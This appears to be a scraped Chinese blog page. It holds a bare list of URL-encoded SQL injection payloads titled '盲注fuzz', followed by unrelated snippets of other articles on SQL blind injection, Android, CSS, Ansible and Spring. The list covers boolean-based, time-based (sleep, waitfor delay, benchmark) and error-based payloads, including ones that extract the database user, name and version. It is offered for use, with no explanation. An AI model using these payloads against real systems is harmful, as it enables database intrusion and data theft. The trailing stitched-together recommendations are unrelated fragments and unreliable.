盲注fuzz
\
'
"
%df'
%df"
and%201=1
and%201=2
'%20and%20'1'='1
'%20and%20'1'='2
"%20and%20"1"="1
"%20and%20"1"="2
)%20and%20(1=1
)%20and%20(1=2
')%20and%20('1'='1
')%20and%20('1'='2
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
OR%201=1
OR%201=2
'%20OR%201=1--%20-
'%20OR%201=2--%20-
)%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=1--%20-
')%20OR%201=2--%20-
"%20OR%20"1"="1
"%20OR%20"1"="2
'%20OR%20'1'='1
'%20OR%20'1'='2
)%20OR%20(1=1
)%20OR%20(1=2
')%20OR%20('1'='1
')%20OR%20('1'='2
(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
,(1-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,(1-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end))
,1=if((1=1),1,(select%201%20union%20select%202))
,1=if((1=2),1,(select%201%20union%20select%202))
,If((1=1),1,(select%201%20union%20select%202))--%20-
,If((1=2),1,(select%201%20union%20select%202))--%20-
,If((1=1),sleep(4),(select%201%20union%20select%202))--%20-
-IF((1=1),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-IF((1=2),1,(SELECT%201%20UNION%20SELECT%202))--%20-
-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
'%2b(if((1=1%20and%20sleep(4)),1,(select%201%20union%20select%202)))%2b'a
-IF((1=1),sleep(4),(SELECT%201%20UNION%20SELECT%202))--%20-
';(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
;SELECT%20sleep(4)
);SELECT%20sleep(4)--%20-
;SELECT%20sleep(4)--%20-
;(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
'%20AND%20SLEEP(4)%23
AND%20sleep(4)
'%20AND%20sleep(4)%20AND%20'1'='1
')%20AND%20sleep(4)%20AND%20('1'='1
)%20AND%20sleep(4)%20AND%20(1=1
"%20AND%20sleep(4)%20AND%20"1"="
')%20and%20(select(0)from(select(sleep(4)))x)--%20-
and%20(select(0)from(select(sleep(4)))x)
and%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20and%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
"%20and%20(select(0)from(select(sleep(4)))x)%20and%20"1"="1
)%20and%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20and%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
rlike%20(select(0)from(select(sleep(4)))x)%20and%201=1
'%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
)%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
')%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
;waitfor%20delay%20'0:0:4'%20--%20-
';waitfor%20delay%20'0:0:4'%20--%20-
);waitfor%20delay%20'0:0:4'%20--%20-
');waitfor%20delay%20'0:0:4'%20--%20-
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT%20*%20FROM(SELECT(sleep(4)))lWuP)
procedure%20analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)
xor%201=2
xor%202=2
%2527%20%20%20%20%20%20%20
%0A%09UNION%0CSELECT%A0NULL%20%23
UNION%20SELECT%20/*!50000%205,null;%00*//*!40000%204,null--%20,*//*!30000%203,null--%20x*/0,null--+
''%20or%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x7c,database(),0x7c,version())),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23
''%20or%20updatexml(1,concat(0x7e,(database())),0)%20
盲注fuzz的更多相关文章
- mysql基于“时间”的盲注
无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...
- SQL盲注之正则攻击
我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息.故攻击方式如下: 1. 判断第一个表名的第一个字符是否是a-z中的字符,其中bli ...
- sql 盲注之正则表达式攻击
-----------------------------------------MYSQL 5+----------------------------------------- 我们都已经知道,在 ...
- 小白日记42:kali渗透测试之Web渗透-SQL盲注
SQL盲注 [SQL注入介绍] SQL盲注:不显示数据库内建的报错信息[内建的报错信息帮助开发人员发现和修复问题],但由于报错信息中提供了关于系统的大量有用信息.当程序员隐藏了数据库内建报错信息,替换 ...
- UPdate 延时盲注之小技巧
Title:UPdate 延时盲注之小技巧 --2014-06-05 15:21 UPDATE TABLEZZZ SET zz=111111 where id=$id 当TABLEZZZ表为空的时候 ...
- WEB安全实战(一)SQL盲注
前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...
- zzcms8.2#任意用户密码重置#del.php时间盲注#复现
00x0 引言 早上起来,发现seebug更新了一批新的洞, 发现zzcms8.2这个洞好多人在挖,于是我就默默的踏上了复现之路(要不是点进去要买详情,我何必这么折腾~) 环境:zzcms8.2(产品 ...
- 实验吧_who are you?(盲注)
who are you? 翻翻源码,抓抓包,乱试一通都没有什么结果 题目中提示有ip,立马应该联想到X-Forwarded-For 虽然知道是这个方面的题,但完全不知道从何入手,悄咪咪去翻一下wp 才 ...
- Python:SQLMap源码精读—基于时间的盲注(time-based blind)
建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...
随机推荐
- 解决cvc-complex-type.2.4.a: Invalid content was found starting with element
今天用myeclipse导入 一个项目出现后出现cvc-complex-type.2.4.a: Invalid content was found starting with element 'inf ...
- Handler 机制(一)—— Handler的实现流程
由于Android采用的是单线程模式,开发者无法在子线程中更新 UI,所以系统给我提供了 Handler 这个类来实现 UI 更新问题.本贴主要说明 Handler 的工作流程. 1. Handler ...
- css之Grid Layout详解
css之Grid Layout详解 CSS Grid Layout擅长将页面划分为主要区域,或者在从HTML基元构建的控件的各个部分之间定义大小,位置和图层之间的关系. 与表格一样,网格布局使作者能够 ...
- 009.Ansible模板管理 Jinja2
一 Jinja2简介 Jinja2是基于python的模板引擎. 假设说现在我们需要一次性在10台主机上安装redis,这个通过playbook现在已经很容易实现.默认情况下,所有的redis安装完成 ...
- SpringBoot内置生命周期事件详解 SpringBoot源码(十)
SpringBoot中文注释项目Github地址: https://github.com/yuanmabiji/spring-boot-2.1.0.RELEASE 本篇接 SpringBoot事件监听 ...
- 配置路由器/交换机的Telnet登录
实验目的:给配置路由器/交换机管理IP地址.设置Telnet的登录帐号.密码. 第一步:配置路由器的名称.接口IP地址. Switch> Switch>en Switch# Switch# ...
- spring IoC容器类接口关系梳理
整理了下spring中容器类的接口,用UML画了张图(并不十分严格按照UML标准,省略了些方法).
- 信息竞赛进阶指南--递归法求中缀表达式的值,O(n^2)(模板)
// 递归法求中缀表达式的值,O(n^2) int calc(int l, int r) { // 寻找未被任何括号包含的最后一个加减号 for (int i = r, j = 0; i >= ...
- 深度使用魅族16T后的评价(本人魅友,绝对客观公正,不要盲目的为手机厂商辩护,想想从当初到现在,魅族正在一步步背离自己的信仰,有问题,解决问题才能有更好的发展)
缺点: 电池电量问题 发布会上,那都是吹的,真是的体验效果掉电很快,大概只有描述的2/3的使用时间 屏幕触控失灵问题 我也看了很多评价,这个也挺多的,可能是魅族品控的问题,某宝到现在没给我退货换货 发 ...
- xml出现Exception in thread "main" java.lang.NullPointerException
运行代码出现Exception in thread "main" java.lang.NullPointerException 可以看下这个链接:https://ask.csdn. ...